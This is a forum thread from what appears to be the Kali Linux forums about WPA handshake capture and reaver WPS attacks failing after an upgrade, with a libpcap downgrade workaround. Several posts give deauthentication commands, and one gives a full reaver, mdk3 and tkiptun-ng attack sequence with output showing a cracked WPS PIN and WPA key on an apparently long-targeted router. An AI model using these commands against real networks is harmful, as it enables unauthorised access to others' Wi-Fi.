Results 1 to 15 of 15

Thread: Problem with capturing handshake with new version of Kali

  1. #1
    Join Date
    2015-Mar
    Posts
    8

    Problem with capturing handshake with new version of Kali

    Hello to all of you, I'm forced to register and ask some questions because I have some problems...

    I use Kali Linux ( some older version ) couple of months ago and all was ok, it work very well... Two days ago I download latest version and install it on my Desktop and Lap top, and I have problems with capturing a 4way handshake. As far as I know when I type command airodump-ng -c -w --bssid mon0 then I listen to certain AP, and it is enough that someone ( client ) connect on AP and I will get 4 way handshake immediately. Now that is not working. Also when I see some connected clients in other terminal I type : aireplay-ng -0 0 -a mon0, or aireplay-ng -0 0 -a -c mon0, but nothing is happens... I use same hardware devices as I used before when work very well...
    Also one of my friends report to me same problem, before works great with him, and now he have problems like me...

    Also we have problems with wash and reaver, in wash it wont to show signal power.

    Does anyone knows what is happening and does anyone have similar problems.

    Thanks.

  2. #2
    Join Date
    2013-Jul
    Posts
    12
    Quote Originally Posted by Animal View Post
    Hello to all of you, I'm forced to register and ask some questions because I have some problems...

    I use Kali Linux ( some older version ) couple of months ago and all was ok, it work very well... Two days ago I download latest version and install it on my Desktop and Lap top, and I have problems with capturing a 4way handshake. As far as I know when I type command airodump-ng -c -w --bssid mon0 then I listen to certain AP, and it is enough that someone ( client ) connect on AP and I will get 4 way handshake immediately. Now that is not working. Also when I see some connected clients in other terminal I type : aireplay-ng -0 0 -a mon0, or aireplay-ng -0 0 -a -c mon0, but nothing is happens... I use same hardware devices as I used before when work very well...
    Also one of my friends report to me same problem, before works great with him, and now he have problems like me...

    Also we have problems with wash and reaver, in wash it wont to show signal power.

    Does anyone knows what is happening and does anyone have similar problems.

    Thanks.
    I guess you have a wireless card with atheros chipset?
    The problem is reported in bugsystem and apear already in kali 1.0.7
    I think its some problem between the ath9k driver and the kernel 3.14 and 3.18 wich kali used from 1.0.7 and to now.
    Dont know if they are doing any solutions for this yet.
    But yeah i have the same problem with my awus036hna with atheros chip. my integreated intel works fine.

  3. #3
    Join Date
    2015-Mar
    Posts
    8
    Quote Originally Posted by squashen View Post
    I guess you have a wireless card with atheros chipset?
    The problem is reported in bugsystem and apear already in kali 1.0.7
    I think its some problem between the ath9k driver and the kernel 3.14 and 3.18 wich kali used from 1.0.7 and to now.
    Dont know if they are doing any solutions for this yet.
    But yeah i have the same problem with my awus036hna with atheros chip. my integreated intel works fine.
    Hm, yes I have TP link 422 g v2 with Atheros AR9271, but I also have other card, a copy of Alfa it is Alfa awus036h with Ralink 3070 and have the same problem, I can not tell for this Alfa because I get it 30 days ago, so I can't tell is Alfa works before, like my 422g works with no problems.

    But I will ask my friend who also have same problem like me, he also some time ago capturing handshakes with no problem and now he has same problems like me.

    Sorry for my bad English, but I think you can understand what I want to say

  4. #4
    Join Date
    2013-Jul
    Posts
    12
    Quote Originally Posted by Animal View Post
    Hm, yes I have TP link 422 g v2 with Atheros AR9271, but I also have other card, a copy of Alfa it is Alfa awus036h with Ralink 3070 and have the same problem, I can not tell for this Alfa because I get it 30 days ago, so I can't tell is Alfa works before, like my 422g works with no problems.

    But I will ask my friend who also have same problem like me, he also some time ago capturing handshakes with no problem and now he has same problems like me.

    Sorry for my bad English, but I think you can understand what I want to say
    No problem whit the English, my sucks 2XD

    I have seen this solution in some forum. didnt work for me but, for some else it did.

    #41 ggb...@gmail.com

    To solve the issue, just follow this, as suggested by johnsmit...@gmail.com at https://code.google.com/p/reaver-wps/wiki/README:


    "Hello guys/gals, this is not a reaver problem. This is output:libpcap0.8:i386 1.5.3-2, does not work for reaver/wash and must be downgraded to libpcap0.8:i386 1.4.0-2.

    use wget: wget http://mirrors.kernel.org/ubuntu/poo...4.0-2_i386.deb http://mirrors.kernel.org/ubuntu/poo...4.0-2_i386.deb

    then install: sudo dpkg -i libpcap0.8_1.4.0-2_i386.deb libpcap0.8-dev_1.4.0-2_i386.deb Note: if you have a 64bit OS, then change out to: libpcap0.8_1.4.0-2_amd64.deb libpcap0.8-dev_1.4.0-2_amd64.deb

    then: sudo dpkg -i libpcap0.8_1.4.0-2_amd64.deb libpcap0.8-dev_1.4.0-2_amd64.deb "

    May 30, 2014

  5. #5
    Join Date
    2015-Mar
    Posts
    8
    Quote Originally Posted by squashen View Post
    No problem whit the English, my sucks 2XD

    I have seen this solution in some forum. didnt work for me but, for some else it did.

    #41 ggb...@gmail.com

    To solve the issue, just follow this, as suggested by johnsmit...@gmail.com at https://code.google.com/p/reaver-wps/wiki/README:


    "Hello guys/gals, this is not a reaver problem. This is output:libpcap0.8:i386 1.5.3-2, does not work for reaver/wash and must be downgraded to libpcap0.8:i386 1.4.0-2.

    use wget: wget http://mirrors.kernel.org/ubuntu/poo...4.0-2_i386.deb http://mirrors.kernel.org/ubuntu/poo...4.0-2_i386.deb

    then install: sudo dpkg -i libpcap0.8_1.4.0-2_i386.deb libpcap0.8-dev_1.4.0-2_i386.deb Note: if you have a 64bit OS, then change out to: libpcap0.8_1.4.0-2_amd64.deb libpcap0.8-dev_1.4.0-2_amd64.deb

    then: sudo dpkg -i libpcap0.8_1.4.0-2_amd64.deb libpcap0.8-dev_1.4.0-2_amd64.deb "

    May 30, 2014
    Hm, I don't know what all this means but I only know that I have big problems right now with capturing 4way handshake, with my two adapters, and friend have, AirLive WL-1600USB 802.11g Adapter [Realtek RTL8187L], also have problems like me now, and before all works like charm for me and for him...
    Is interestingly how nobody have problems like we ? I am convinced that something in new version of Kali Linux is not ok.

  6. #6
    Join Date
    2015-Mar
    Posts
    8
    I downloaded and put old version of Kali 1.0.6, and try to catch some handshakes, and everything is working like a charm, and without any problem, so obviously there is some problems with new version of Kali and catching handshakes, to remind problem is with 3 adapters and different chipsets and new version of Kali, with old one all is working OK.

    Please if someone have solution that this can work without problems in latest version of Kali, post here.

  7. #7
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    could you please post how you obtain handshakes to try and isolate this problem. I will try your way to see if I can duplicate..

    I'm having difficulties also with handshakes, but it is not impossible, just more difficult. I'm using FrankenScript.

    Then if we can confirm that it is a bug, we can report it to the bug tracker. https://bugs.kali.org/view_all_bug_page.php
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  8. #8
    Join Date
    2013-Jul
    Posts
    843
    MTeams are able to capture handshakes when operating with airodump-ng in the passive mode.(ie not using aireplay-ng -0 to try and produce a handshake.

    We have seen a marked lack of response to reaver pin requests as of late.

    We will downgrade one(1) of our i386 kali-linux hardrive installs and run some tests on known targets not responding to reaver. Anything of significance will be reported in this thread.

    MTeams

  9. #9
    Join Date
    2013-Jul
    Posts
    843
    MTeams provide the following as a second opinion:

    We have several long standing targetsAPs that simply donot respond to reaver. This means nothing happens and eventually reaver reports no association.

    Furthermore aireplay-ng association requests go nowhere as well

    We did the downgrade and these APs immediately began to respond to reaver and pin harvesting began.

    The downgrade is simple:

    This is the link for copy and paste for the download.

    http://mirrors.kernel.org/ubuntu/poo...4.0-2_i386.deb


    Move the file from the download folder to root and enter:


    sudo dpkg -i libpcap0.8_1.4.0-2_i386.deb libpcap0.8-dev_1.4.0-2_i386.deb


    Read the threads above for 64 bit but we did not test this/

    Works like a charm.

    When someone gets enough technical info they might submit a bug report.

    Thanks to all

    Musket Teams

  10. #10
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    thanks for testing mmusket33,

    I'm a bit confused. According to the debian page https://packages.debian.org/search?k...ll&section=all , libpcap0.8_1.4.0-2 would be an upgrade, not a downgrade. Can you confirm?

    1.1.1-2 squeeze, 1.3.0-1 wheezy, 1.6.2-2 jessie, ...
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  11. #11
    Join Date
    2015-Mar
    Posts
    8
    Quote Originally Posted by Quest View Post
    could you please post how you obtain handshakes to try and isolate this problem. I will try your way to see if I can duplicate..

    I'm having difficulties also with handshakes, but it is not impossible, just more difficult. I'm using FrankenScript.

    Then if we can confirm that it is a bug, we can report it to the bug tracker. https://bugs.kali.org/view_all_bug_page.php
    Yes this is truth, it is very difficult to catch a handshake but it is not impossible. But there is no a rule when the handshake will be catched, clients are connecting and disconecting but nothing is happens, also aireplay-ng -0 0 -a mon0 don't help... But sometimes it catch a handshake without a rule.
    1.0.6 working well I catch about 5 handshakes today with no problems, so problem is in new version of Kali 100 %.

    I must to ask one more thing, is there some AP's that are immune for this attack ? I can't get handshake on some router with Zydas chipset, the client is connected but it not responding to aireplay-ng -0 0 -a -c mon0, also some other client connected when I listen that AP, but there is no handshake, I try many times but nothing ?

  12. #12
    Join Date
    2013-Jul
    Posts
    843
    After downgrading the lipocap file we directed reaver at targetAPs that previously didnot respond at all.

    The router in this example had resisted every reaver attack thrown at it. Wash showed it open BUT for a year we got nothing. We ran:


    reaver -i mon0 -a -f -c 3 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -vv -N -T 1 -t 20 -d 0 -x 30 --mac=00:11:22:33:44:55

    The router responded but would not give up any pins which was a first.

    We ran up our aireplay-ng restart program and the router responded better but still no pins.

    So we decided to try something novel We stopped reaver

    And With aireplay-ng -1 and mdk3 -f still running in terminal windows we ran up

    tkiptun-ng -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 mon0

    Now with tkiptun-ng sending 4 directed DeAuth, STMAC 00:11:22:33:44:55, we restarted reaver again with tkiptun-ng, aireplay-ng -1 and mdk3 -f running in the background in terminal windows - the results can be seen below:

    root@-:~# reaver -i mon0 -a -f -c 3 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -vv -N -T 1 -t 20 -d 0 -x 30 --mac=00:11:22:33:44:55

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    [+] Switching mon0 to channel 3
    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: targetAP)
    [+] Trying pin 12345670
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: targetAP)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: targetAP)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: targetAP)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: targetAP)
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 419 seconds
    [+] WPS PIN: '12345670'
    [+] WPA PSK: 'WPAKey'
    [+] AP SSID: 'targetAP'
    [+] Nothing done, nothing to save.
    Last edited by mmusket33; 2015-03-18 at 01:21.

  13. #13
    Join Date
    2013-Jul
    Posts
    843
    Changing to libpcap0.8:i386 1.4.0-2 has not worked on one(1) of the three(3) computers we tested this on. All were 1-09a installs updated and upgraded. The first computer took the change flawlessly. The second computer would not accept the change at first then loaded it on subsequent tries. The third computer would not accept this version at all. Computers two(2) and three(3) are identical models.

    MTeams

  14. #14
    Join Date
    2014-Feb
    Posts
    4
    When trying the above i get the following:

    Depends: libc6 (>= 2.14) but 2.13-38+deb7u6 is to be installed

    tried various methods to fix, but ended up bricking Kali. Had to a clean install

  15. #15
    Join Date
    2015-Oct
    Location
    Maine, USA
    Posts
    1
    The libpcap fix's mirror moved and after Messing with this dang computer for 2 weeks to get it back to the way I had it before I upgraded kali I finally thigured it out. Lol. This is the new mirror fix for kali and backbox for Oct-2015.

    -Fixing WPS on Newer version's of BackBox and Kali by downgrading to libpcap 1.4

    "wget http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/libpcap0.8_1.4.0-2_amd64.deb"
    "wget http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/libpcap0.8-dev_1.4.0-2_amd64.deb"
    dpkg -i libpcap0.8_1.4.0-2_amd64.deb libpcap0.8-dev_1.4.0-2_amd64.deb

    Reinstall Reaver and make reaver folder in etc if not there and wps will work as well as handshake cap.
    If fixing an i386 then replace all _amd64.deb to _i386.deb

    "wget http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/libpcap0.8_1.4.0-2_i386.deb"
    "wget http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/libpcap0.8-dev_1.4.0-2_i386.deb"
    dpkg -i libpcap0.8_1.4.0-2_i386.deb libpcap0.8-dev_1.4.0-2_i386.deb
    Last edited by code8ter; 2015-10-31 at 11:04.

Similar Threads

  1. Wifite not capturing WPA handshake
    By cybeh in forum General Archive
    Replies: 15
    Last Post: 2017-06-23, 08:13
  2. Aircrack keeps capturing old Handshake
    By flyinghaggis in forum TroubleShooting Archive
    Replies: 0
    Last Post: 2013-12-06, 14:22
  3. Problem with amd 64 version of KALI!
    By baadr in forum Installing Archive
    Replies: 1
    Last Post: 2013-06-27, 03:57
  4. Problem with VM version of kali
    By HardReset in forum Installing Archive
    Replies: 2
    Last Post: 2013-04-28, 17:33

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •